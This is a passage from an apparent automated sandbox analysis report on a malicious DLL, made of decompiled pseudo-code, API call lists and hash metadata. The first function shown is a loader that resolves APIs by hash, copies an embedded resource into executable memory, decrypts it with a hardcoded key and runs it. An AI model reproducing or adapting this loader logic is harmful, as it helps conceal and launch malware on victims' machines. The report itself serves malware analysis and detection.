                                                                                                            						_t44 = E10001FF0();
                                                                                                            						_push(0xccfd283f);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3e0 = _t44;
                                                                                                            						_t45 = E10001FF0();
                                                                                                            						_push(0x298c691d);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3d0 = _t45;
                                                                                                            						_t46 = E10001FF0();
                                                                                                            						_push(0x40ec656b);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3e4 = _t46;
                                                                                                            						_t47 = E10001FF0();
                                                                                                            						_push(0x40946966);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3fc = _t47;
                                                                                                            						_t48 = E10001FF0();
                                                                                                            						_push(0x5496c247);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3a8 = _t48;
                                                                                                            						_t49 = E10001FF0();
                                                                                                            						_push(0x3b465a8a);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3ac = _t49;
                                                                                                            						_t50 = E10001FF0();
                                                                                                            						_push(0x66afc09d);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3b8 = _t50;
                                                                                                            						_t51 = E10001FF0();
                                                                                                            						_push(0x5eb2ba6);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3d4 = _t51;
                                                                                                            						_t52 = E10001FF0();
                                                                                                            						_push(0x3c6bbc0e);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3cc = _t52;
                                                                                                            						_t53 = E10001FF0();
                                                                                                            						_push(0x3f32f2a5);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3c8 = _t53;
                                                                                                            						_t54 = E10001FF0();
                                                                                                            						_push(0x112ecd9a);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3d8 = _t54;
                                                                                                            						_t55 = E10001FF0();
                                                                                                            						_push(0xcfb09550);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d400 = _t55;
                                                                                                            						_t56 = E10001FF0();
                                                                                                            						_push(0x30fe1b19);
                                                                                                            						_push(_t40);
                                                                                                            						 *0x1004d3bc = _t56;
                                                                                                            						_t57 = E10001FF0();
                                                                                                            						_push(0x33a92211);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3b4 = _t57;
                                                                                                            						_t58 = E10001FF0();
                                                                                                            						_push(0xaab3e2a9);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3f8 = _t58;
                                                                                                            						_t59 = E10001FF0();
                                                                                                            						_push(0x31e84135);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3f4 = _t59;
                                                                                                            						_t60 = E10001FF0();
                                                                                                            						_push(0xaef34aa1);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3dc = _t60;
                                                                                                            						_t61 = E10001FF0();
                                                                                                            						_push(0x1e75927d);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3b0 = _t61;
                                                                                                            						_t62 = E10001FF0();
                                                                                                            						_push(0x56331b6e);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3e8 = _t62;
                                                                                                            						_t63 = E10001FF0();
                                                                                                            						_push(0x1cf8ffb);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3c4 = _t63;
                                                                                                            						_t64 = E10001FF0();
                                                                                                            						_t128 = _a4;
                                                                                                            						 *0x1004d3c0 = _t64; // executed
                                                                                                            						_t65 = FindResourceW(_t128, 0x5f4c, 0x1003ce4c); // executed
                                                                                                            						_t123 = _t65;
                                                                                                            						_v4 = LoadResource(_t128, _t123);
                                                                                                            						_t124 = SizeofResource(_t128, _t123);
                                                                                                            						_t182 =  *0x1004d3b8; // 0x76ec66e0
                                                                                                            						if(_t182 == 0) {
                                                                                                            							_t96 =  *0x1004b0e8; // 0x0
                                                                                                            							_t113 =  *0x1004b0e0; // 0x0
                                                                                                            							_t68 =  *0x1004b0d8; // 0x0
                                                                                                            							_t129 =  *0x1004b0dc; // 0x0
                                                                                                            							_t149 =  *0x1004b0ec; // 0x0
                                                                                                            							_t69 =  *0x1004b0e4; // 0x0
                                                                                                            							_t15 = _t113 * 2; // 0x3
                                                                                                            							_t152 = _t149 * _t68 + ((_t96 * _t113 + _t68) * 0x3fffffff + _t129) * _t96 + _t113 + _t129;
                                                                                                            							_a8 = _t152;
                                                                                                            							_t110 = (_t129 + _t15 + 3) * _t69 << 2;
                                                                                                            							_t20 = _t96 + 2; // 0x2
                                                                                                            							_t157 =  *0x1004b0d8; // 0x0
                                                                                                            							_t117 = _t69 - _t20 * _t129 - _t113 * _t157 + (_t69 - _t20 * _t129 - _t113 * _t157) * 0x00000002 + (_t69 * _t96 * _t157 + _t69 * _t96 * _t157 * 0x00000002 - 0x00000003) *  *0x1004b0ec + 0x00002000 | 0x00001000 + _a8 * 0x00000004 - _t110;
                                                                                                            							__eflags = _t117;
                                                                                                            							_t77 = VirtualAlloc(0, _t124, _t117, 0x40 + _t152 * 4 - _t110);
                                                                                                            						} else {
                                                                                                            							_t112 =  *0x1004b0e8; // 0x0
                                                                                                            							_t119 =  *0x1004b0dc; // 0x0
                                                                                                            							_t85 =  *0x1004b0ec; // 0x0
                                                                                                            							_t99 =  *0x1004b0d8; // 0x0
                                                                                                            							_t4 = _t99 + 0x3fffffff; // 0x3fffffff
                                                                                                            							_t138 =  *0x1004b0e0; // 0x0
                                                                                                            							_t8 = _t138 * 2; // 0x3
                                                                                                            							_t100 =  *0x1004b0e0; // 0x0
                                                                                                            							_t77 =  *0x1004d3b8(0xffffffff, 0, _t124, 0x00001000 + (_t85 * _t99 + ((_t112 * _t138 + _t99) * 0x3fffffff + _t119) * _t112 - (_t119 + _t8 + 0x00000003) *  *0x1004b0e4 + _t100 + _t119) * 0x00000004 | _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + 0x00002000, 0x40 + (_t112 * 0x3fffffff + _t4 * _t119 + _t85 + _t138) * 4, 0); // executed
                                                                                                            						}
                                                                                                            						_t133 = _t77;
                                                                                                            						memcpy(_t133, _v4, _t124);
                                                                                                            						_t79 = malloc(0x9d1);
                                                                                                            						_t97 = _t79;
                                                                                                            						E10002340();
                                                                                                            						E100027D0();
                                                                                                            						 *0x1004d3e0(_t97, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t97, _t133, _t124, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t97, "8nGA7ohfFpugG(l$!#2u__*t5EaFD77", 0x20);
                                                                                                            						_t83 = E10005260();
                                                                                                            						 *0x1004d408 = _t83;
                                                                                                            						 *0x1004d404(_a4, 1, 0, _t133, _t124, E100045D0, E100045F0, E10004610, E10004650, E10004670, 0);
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x10006307
                                                                                                            0x1000630c
                                                                                                            0x10006311
                                                                                                            0x10006312
                                                                                                            0x10006317
                                                                                                            0x1000631c
                                                                                                            0x10006321
                                                                                                            0x10006322
                                                                                                            0x10006327
                                                                                                            0x1000632e
                                                                                                            0x10006333
                                                                                                            0x10006334
                                                                                                            0x1000633a
                                                                                                            0x1000633f
                                                                                                            0x10006344
                                                                                                            0x10006345
                                                                                                            0x1000634a
                                                                                                            0x1000634f
                                                                                                            0x10006361
                                                                                                            0x10006366
                                                                                                            0x10006368
                                                                                                            0x10006374
                                                                                                            0x1000637e
                                                                                                            0x10006380
                                                                                                            0x10006386
                                                                                                            0x10006432
                                                                                                            0x10006438
                                                                                                            0x1000643e
                                                                                                            0x10006443
                                                                                                            0x10006449
                                                                                                            0x10006459
                                                                                                            0x1000646d
                                                                                                            0x10006474
                                                                                                            0x10006476
                                                                                                            0x10006481
                                                                                                            0x10006487
                                                                                                            0x10006494
                                                                                                            0x100064c4
                                                                                                            0x100064c4
                                                                                                            0x100064ca
                                                                                                            0x1000638c
                                                                                                            0x1000638c
                                                                                                            0x10006392
                                                                                                            0x10006398
                                                                                                            0x1000639e
                                                                                                            0x100063a4
                                                                                                            0x100063b9
                                                                                                            0x100063d6
                                                                                                            0x100063fa
                                                                                                            0x10006427
                                                                                                            0x10006427
                                                                                                            0x100064d5
                                                                                                            0x100064d9
                                                                                                            0x100064e4
                                                                                                            0x100064f1
                                                                                                            0x10006503
                                                                                                            0x1000651a
                                                                                                            0x10006523
                                                                                                            0x10006546
                                                                                                            0x10006557
                                                                                                            0x1000655c
                                                                                                            0x00000000
                                                                                                            0x10006565
                                                                                                            0x10006133

                                                                                                            APIs
                                                                                                            • FindResourceW.KERNEL32(?,00005F4C,1003CE4C), ref: 10006366
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1000636C
                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 10006378
                                                                                                            • VirtualAllocExNuma.KERNEL32(000000FF,00000000,00000000,00000000,00000000,00000000), ref: 10006427
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 100064CA
                                                                                                            • memcpy.MSVCRT ref: 100064D9
                                                                                                            • malloc.MSVCRT ref: 100064E4
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10006523
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$AllocVirtual$??3@FindLoadNumaSizeofmallocmemcpy
                                                                                                            • String ID: 8nGA7ohfFpugG(l$!#2u__*t5EaFD77$kernel32.dll$msvcrt.dll$ntdll.dll
                                                                                                            • API String ID: 3024364686-882265788
                                                                                                            • Opcode ID: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                                                            • Instruction ID: 1699d20feb2015e992388abaa39e01a506b89f8495deb80be789641e5ebed42c
                                                                                                            • Opcode Fuzzy Hash: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                                                            • Instruction Fuzzy Hash: ACA159719403256FF704EF748EC6E96769CEB46681B00453FF511E726AEBB0B5008B9D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10037446(signed char* __ecx) {
                                                                                                            				struct _CRITICAL_SECTION* _v8;
                                                                                                            				void* _v12;
                                                                                                            				char _v32;
                                                                                                            				char _v40;
                                                                                                            				char _v48;
                                                                                                            				signed int __edi;
                                                                                                            				void* __esi;
                                                                                                            				struct _CRITICAL_SECTION* _t42;
                                                                                                            				intOrPtr _t43;
                                                                                                            				void* _t44;
                                                                                                            				void* _t45;
                                                                                                            				void* _t49;
                                                                                                            				void* _t50;
                                                                                                            				signed int _t71;
                                                                                                            				signed char* _t73;
                                                                                                            				signed int _t82;
                                                                                                            				signed char* _t85;
                                                                                                            				void* _t87;
                                                                                                            				void* _t89;
                                                                                                            				void* _t91;
                                                                                                            				void* _t92;
                                                                                                            				void* _t94;
                                                                                                            
                                                                                                            				_t73 = __ecx;
                                                                                                            				_t89 = _t94;
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t85 = __ecx;
                                                                                                            				_t1 = _t85 + 0x1c; // 0x1004f010
                                                                                                            				_t42 = _t1;
                                                                                                            				_v8 = _t42;
                                                                                                            				EnterCriticalSection(_t42);
                                                                                                            				_t3 = _t85 + 4; // 0x20
                                                                                                            				_t43 =  *_t3;
                                                                                                            				_t4 = _t85 + 8; // 0x3
                                                                                                            				if( *_t4 >= _t43) {
                                                                                                            					L6:
                                                                                                            					_t82 = 1;
                                                                                                            					if(_t43 <= 1) {
                                                                                                            						L11:
                                                                                                            						_t20 = _t43 + 0x20; // 0x40
                                                                                                            						_t71 = _t20;
                                                                                                            						_t21 = _t85 + 0x10; // 0x3100e68
                                                                                                            						_t44 =  *_t21;
                                                                                                            						if(_t44 != 0) {
                                                                                                            							_t45 = GlobalHandle(_t44);
                                                                                                            							_v12 = _t45;
                                                                                                            							GlobalUnlock(_t45);
                                                                                                            							_t49 = GlobalReAlloc(_v12, _t71 << 3, 0x2002);
                                                                                                            						} else {
                                                                                                            							_t49 = GlobalAlloc(2, _t71 << 3); // executed
                                                                                                            						}
                                                                                                            						if(_t49 != 0) {
                                                                                                            							_t50 = GlobalLock(_t49);
                                                                                                            							_t26 = _t85 + 4; // 0x20
                                                                                                            							_v12 = _t50;
                                                                                                            							E10011C50(_t50 +  *_t26 * 8, 0, _t71 -  *_t26 << 3);
                                                                                                            							 *(_t85 + 4) = _t71;
                                                                                                            							 *(_t85 + 0x10) = _v12;
                                                                                                            							goto L19;
                                                                                                            						} else {
                                                                                                            							_t24 = _t85 + 0x10; // 0x3100e68
                                                                                                            							_t87 =  *_t24;
                                                                                                            							if(_t87 != 0) {
                                                                                                            								GlobalLock(GlobalHandle(_t87));
                                                                                                            							}
                                                                                                            							LeaveCriticalSection(_v8);
                                                                                                            							_push(_t89);
                                                                                                            							_t91 = _t94;
                                                                                                            							_push(_t73);
                                                                                                            							_v32 = 0x1004d418;
                                                                                                            							E10011C0F( &_v32, 0x10045dc0);
                                                                                                            							asm("int3");
                                                                                                            							_push(_t91);
                                                                                                            							_t92 = _t94;
                                                                                                            							_push(_t73);
                                                                                                            							_v40 = 0x1004d4b0;
                                                                                                            							E10011C0F( &_v40, 0x10045e04);
                                                                                                            							asm("int3");
                                                                                                            							_push(_t92);
                                                                                                            							_push(_t73);
                                                                                                            							_v48 = 0x1004d548;
                                                                                                            							E10011C0F( &_v48, 0x10045e48);
                                                                                                            							asm("int3");
                                                                                                            							return _t73[0x70];
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t17 = _t85 + 0x10; // 0x3100e68
                                                                                                            						_t73 =  *_t17 + 8;
                                                                                                            						while(( *_t73 & 0x00000001) != 0) {
                                                                                                            							_t82 = _t82 + 1;
                                                                                                            							_t73 =  &(_t73[8]);
                                                                                                            							if(_t82 < _t43) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						if(_t82 < _t43) {
                                                                                                            							goto L19;
                                                                                                            						} else {
                                                                                                            							goto L11;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t12 = __esi + 0x10; // 0x3100e68
                                                                                                            					__ecx =  *_t12;
                                                                                                            					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
                                                                                                            						L19:
                                                                                                            						_t33 = _t85 + 0xc; // 0x3
                                                                                                            						if(_t82 >=  *_t33) {
                                                                                                            							_t34 = _t82 + 1; // 0x4
                                                                                                            							 *((intOrPtr*)(_t85 + 0xc)) = _t34;
                                                                                                            						}
                                                                                                            						_t36 = _t85 + 0x10; // 0x3100e68
                                                                                                            						 *( *_t36 + _t82 * 8) =  *( *_t36 + _t82 * 8) | 0x00000001;
                                                                                                            						_t40 = _t82 + 1; // 0x4
                                                                                                            						 *((intOrPtr*)(_t85 + 8)) = _t40;
                                                                                                            						LeaveCriticalSection(_v8);
                                                                                                            						return _t82;
                                                                                                            					} else {
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}


























                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F010,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 10037457
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000040,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374A8
                                                                                                            • GlobalHandle.KERNEL32(03100E68), ref: 100374B1
                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374BB
                                                                                                            • GlobalReAlloc.KERNEL32 ref: 100374CF
                                                                                                            • GlobalHandle.KERNEL32(03100E68), ref: 100374E1
                                                                                                            • GlobalLock.KERNEL32 ref: 100374E8
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374F1
                                                                                                            • GlobalLock.KERNEL32 ref: 100374FD
                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10037545
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667261700-0
                                                                                                            • Opcode ID: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                                                            • Instruction ID: feedd15bf3e86fe32dc878be1727d2ab34921a7f2ef65c1774b7ebc5d14265f1
                                                                                                            • Opcode Fuzzy Hash: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                                                            • Instruction Fuzzy Hash: 8231AB71A00759AFD722CFB5CC88E5ABBF9FB44241B018929E896DB622D730F900CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            [Control-flow graph of function 1001614c; legend: Executed / Not Executed]
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1001614C() {
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t51;
                                                                                                            				signed int _t55;
                                                                                                            				long _t59;
                                                                                                            				signed int _t61;
                                                                                                            				signed int _t62;
                                                                                                            				signed int _t64;
                                                                                                            				signed int _t65;
                                                                                                            				void* _t69;
                                                                                                            				signed int* _t78;
                                                                                                            				signed int _t81;
                                                                                                            				signed int _t82;
                                                                                                            				signed int _t84;
                                                                                                            				signed int _t85;
                                                                                                            				signed int _t86;
                                                                                                            				signed char _t89;
                                                                                                            				signed int _t96;
                                                                                                            				void* _t99;
                                                                                                            				int _t101;
                                                                                                            				void** _t103;
                                                                                                            				void** _t105;
                                                                                                            				signed int** _t106;
                                                                                                            				intOrPtr* _t109;
                                                                                                            				void* _t110;
                                                                                                            
                                                                                                            				_t51 = E100107B6(0x480);
                                                                                                            				if(_t51 != 0) {
                                                                                                            					 *0x1004f920 = _t51;
                                                                                                            					 *0x1004f90c = 0x20;
                                                                                                            					_t1 = _t51 + 0x480; // 0x480
                                                                                                            					_t84 = _t1;
                                                                                                            					while(1) {
                                                                                                            						__eflags = _t51 - _t84;
                                                                                                            						if(_t51 >= _t84) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						 *_t51 =  *_t51 | 0xffffffff;
                                                                                                            						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
                                                                                                            						 *((char*)(_t51 + 4)) = 0;
                                                                                                            						 *((char*)(_t51 + 5)) = 0xa;
                                                                                                            						_t85 =  *0x1004f920; // 0x0
                                                                                                            						_t51 = _t51 + 0x24;
                                                                                                            						_t84 = _t85 + 0x480;
                                                                                                            						__eflags = _t84;
                                                                                                            					}
                                                                                                            					GetStartupInfoA(_t110 + 0x14);
                                                                                                            					__eflags =  *((short*)(_t110 + 0x46));
                                                                                                            					if( *((short*)(_t110 + 0x46)) == 0) {
                                                                                                            						L26:
                                                                                                            						_t81 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            						do {
                                                                                                            							_t86 =  *0x1004f920; // 0x0
                                                                                                            							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
                                                                                                            							__eflags =  *_t103 - 0xffffffff;
                                                                                                            							if( *_t103 != 0xffffffff) {
                                                                                                            								_t49 =  &(_t103[1]);
                                                                                                            								 *_t49 = _t103[1] | 0x00000080;
                                                                                                            								__eflags =  *_t49;
                                                                                                            								goto L42;
                                                                                                            							}
                                                                                                            							__eflags = _t81;
                                                                                                            							_t103[1] = 0x81;
                                                                                                            							if(_t81 != 0) {
                                                                                                            								asm("sbb eax, eax");
                                                                                                            								_t59 =  ~(_t81 - 1) + 0xfffffff5;
                                                                                                            								__eflags = _t59;
                                                                                                            							} else {
                                                                                                            								_t59 = 0xfffffff6;
                                                                                                            							}
                                                                                                            							_t99 = GetStdHandle(_t59);
                                                                                                            							__eflags = _t99 - 0xffffffff;
                                                                                                            							if(_t99 == 0xffffffff) {
                                                                                                            								L40:
                                                                                                            								_t103[1] = _t103[1] | 0x00000040;
                                                                                                            							} else {
                                                                                                            								_t61 = GetFileType(_t99); // executed
                                                                                                            								__eflags = _t61;
                                                                                                            								if(_t61 == 0) {
                                                                                                            									goto L40;
                                                                                                            								}
                                                                                                            								_t62 = _t61 & 0x000000ff;
                                                                                                            								__eflags = _t62 - 2;
                                                                                                            								 *_t103 = _t99;
                                                                                                            								if(__eflags != 0) {
                                                                                                            									__eflags = _t62 - 3;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										_t42 =  &(_t103[1]);
                                                                                                            										 *_t42 = _t103[1] | 0x00000008;
                                                                                                            										__eflags =  *_t42;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_t103[1] = _t103[1] | 0x00000040;
                                                                                                            								}
                                                                                                            								_push(0xfa0);
                                                                                                            								_push( &(_t103[3]));
                                                                                                            								_t64 = E10019599(__eflags);
                                                                                                            								__eflags = _t64;
                                                                                                            								if(_t64 == 0) {
                                                                                                            									L30:
                                                                                                            									_t55 = _t64 | 0xffffffff;
                                                                                                            									L44:
                                                                                                            									return _t55;
                                                                                                            								} else {
                                                                                                            									_t103[2] = _t103[2] + 1;
                                                                                                            									goto L42;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L42:
                                                                                                            							_t81 = _t81 + 1;
                                                                                                            							__eflags = _t81 - 3;
                                                                                                            						} while (_t81 < 3);
                                                                                                            						SetHandleCount( *0x1004f90c);
                                                                                                            						_t55 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            						goto L44;
                                                                                                            					}
                                                                                                            					_t65 =  *(_t110 + 0x48);
                                                                                                            					__eflags = _t65;
                                                                                                            					if(_t65 == 0) {
                                                                                                            						goto L26;
                                                                                                            					}
                                                                                                            					_t101 =  *_t65;
                                                                                                            					_t109 = _t65 + 4;
                                                                                                            					 *(_t110 + 0x10) = _t101 + _t109;
                                                                                                            					__eflags = _t101 - 0x800;
                                                                                                            					if(_t101 >= 0x800) {
                                                                                                            						_t101 = 0x800;
                                                                                                            					}
                                                                                                            					__eflags =  *0x1004f90c - _t101; // 0x20
                                                                                                            					if(__eflags >= 0) {
                                                                                                            						L18:
                                                                                                            						_t82 = 0;
                                                                                                            						__eflags = _t101;
                                                                                                            						if(_t101 <= 0) {
                                                                                                            							goto L26;
                                                                                                            						} else {
                                                                                                            							goto L19;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L19:
                                                                                                            							_t69 =  *( *(_t110 + 0x10));
                                                                                                            							__eflags = _t69 - 0xffffffff;
                                                                                                            							if(_t69 == 0xffffffff) {
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							_t89 =  *_t109;
                                                                                                            							__eflags = _t89 & 0x00000001;
                                                                                                            							if((_t89 & 0x00000001) == 0) {
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							__eflags = _t89 & 0x00000008;
                                                                                                            							if(__eflags != 0) {
                                                                                                            								L23:
                                                                                                            								_t105 = 0x1004f920[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
                                                                                                            								 *_t105 =  *( *(_t110 + 0x10));
                                                                                                            								_t105[1] =  *_t109;
                                                                                                            								_push(0xfa0);
                                                                                                            								_push( &(_t105[3]));
                                                                                                            								_t64 = E10019599(__eflags);
                                                                                                            								__eflags = _t64;
                                                                                                            								if(_t64 == 0) {
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								_t31 =  &(_t105[2]);
                                                                                                            								 *_t31 = _t105[2] + 1;
                                                                                                            								__eflags =  *_t31;
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							__eflags = GetFileType(_t69);
                                                                                                            							if(__eflags == 0) {
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							goto L23;
                                                                                                            							L25:
                                                                                                            							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
                                                                                                            							_t82 = _t82 + 1;
                                                                                                            							_t109 = _t109 + 1;
                                                                                                            							__eflags = _t82 - _t101;
                                                                                                            						} while (_t82 < _t101);
                                                                                                            						goto L26;
                                                                                                            					} else {
                                                                                                            						_t106 = 0x1004f924;
                                                                                                            						while(1) {
                                                                                                            							_t78 = E100107B6(0x480);
                                                                                                            							__eflags = _t78;
                                                                                                            							if(_t78 == 0) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							 *0x1004f90c =  *0x1004f90c + 0x20;
                                                                                                            							 *_t106 = _t78;
                                                                                                            							_t12 =  &(_t78[0x120]); // 0x480
                                                                                                            							_t96 = _t12;
                                                                                                            							while(1) {
                                                                                                            								__eflags = _t78 - _t96;
                                                                                                            								if(_t78 >= _t96) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								 *_t78 =  *_t78 | 0xffffffff;
                                                                                                            								_t78[2] = _t78[2] & 0x00000000;
                                                                                                            								_t78[1] = 0;
                                                                                                            								_t78[1] = 0xa;
                                                                                                            								_t78 =  &(_t78[9]);
                                                                                                            								_t96 =  &(( *_t106)[0x120]);
                                                                                                            								__eflags = _t96;
                                                                                                            							}
                                                                                                            							_t106 =  &(_t106[1]);
                                                                                                            							__eflags =  *0x1004f90c - _t101; // 0x20
                                                                                                            							if(__eflags < 0) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						_t101 =  *0x1004f90c; // 0x20
                                                                                                            						goto L18;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t51 | 0xffffffff;
                                                                                                            			}



























                                                                                                            0x00000000
                                                                                                            0x100161e6
                                                                                                            0x100161e6
                                                                                                            0x100161eb
                                                                                                            0x100161ec
                                                                                                            0x100161f1
                                                                                                            0x100161f4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100161f6
                                                                                                            0x100161fd
                                                                                                            0x100161ff
                                                                                                            0x100161ff
                                                                                                            0x1001621d
                                                                                                            0x1001621d
                                                                                                            0x1001621f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016207
                                                                                                            0x1001620a
                                                                                                            0x1001620e
                                                                                                            0x10016212
                                                                                                            0x10016218
                                                                                                            0x1001621b
                                                                                                            0x1001621b
                                                                                                            0x1001621b
                                                                                                            0x10016221
                                                                                                            0x10016224
                                                                                                            0x1001622a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001622c
                                                                                                            0x1001622e
                                                                                                            0x00000000
                                                                                                            0x1001622e
                                                                                                            0x100161e4
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 100161A9
                                                                                                            • GetFileType.KERNEL32(?), ref: 10016253
                                                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 100162D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleInfoStartupType
                                                                                                            • String ID:
                                                                                                            • API String ID: 2461013171-0
                                                                                                            • Opcode ID: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
